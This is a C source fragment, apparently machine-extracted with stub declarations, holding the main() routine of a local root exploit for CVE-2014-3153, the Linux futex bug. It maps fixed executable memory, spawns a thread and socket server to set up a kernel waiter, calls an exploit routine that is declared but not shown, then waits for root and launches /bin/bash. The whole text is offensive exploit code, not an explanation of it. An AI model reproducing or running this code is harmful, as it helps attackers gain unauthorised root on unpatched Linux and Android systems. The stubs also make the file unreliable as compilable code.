
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_SHARED ;
 unsigned long MMAP_ADDR_BASE ;
 int MMAP_LEN ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int client_to_setup_rt_waiter ;
 int do_exploit (void*) ;
 int execl (char*,char*,int *) ;
 scalar_t__ fork () ;
 int gettid () ;
 scalar_t__ getuid () ;
 int iov_base0 ;
 unsigned long iov_basex ;
 int iov_len0 ;
 int iov_lenx ;
 int main_pid ;
 scalar_t__ mmap (void*,int,int,int,int,int ) ;
 int printf (char*) ;
 int pthread_create (int *,int *,int ,void*) ;
 scalar_t__ server_for_setup_rt_waiter () ;
 scalar_t__ sockfd ;
 int thread_client_to_setup_rt_waiter ;
 int usleep (int) ;

int main(int argc, char *argv[])
{
 unsigned long mapped_address;
 void *waiter_plist;

 printf("CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\n");

 main_pid = gettid();
 if(fork() == 0) {
  iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
  if (iov_base0 < 0xb0000000) {
   printf("mmap failed?\n");
   return 1;
  }
  iov_len0 = 0x10000;

  iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
  if (iov_basex < MMAP_ADDR_BASE) {
   printf("mmap failed?\n");
   return 1;
  }
  iov_lenx = MMAP_LEN;

  waiter_plist = (void *)iov_basex + 0x400;
  pthread_create(&thread_client_to_setup_rt_waiter, ((void*)0), client_to_setup_rt_waiter, waiter_plist);

  sockfd = server_for_setup_rt_waiter();
  if (sockfd < 0) {
   printf("Server failed\n");
   return 1;
  }

  if (!do_exploit(waiter_plist)) {
   return 1;
  }
  return 0;
 }

 while(getuid())
  usleep(100);
 execl("/bin/bash", "bin/bash", ((void*)0));
 return 0;
}
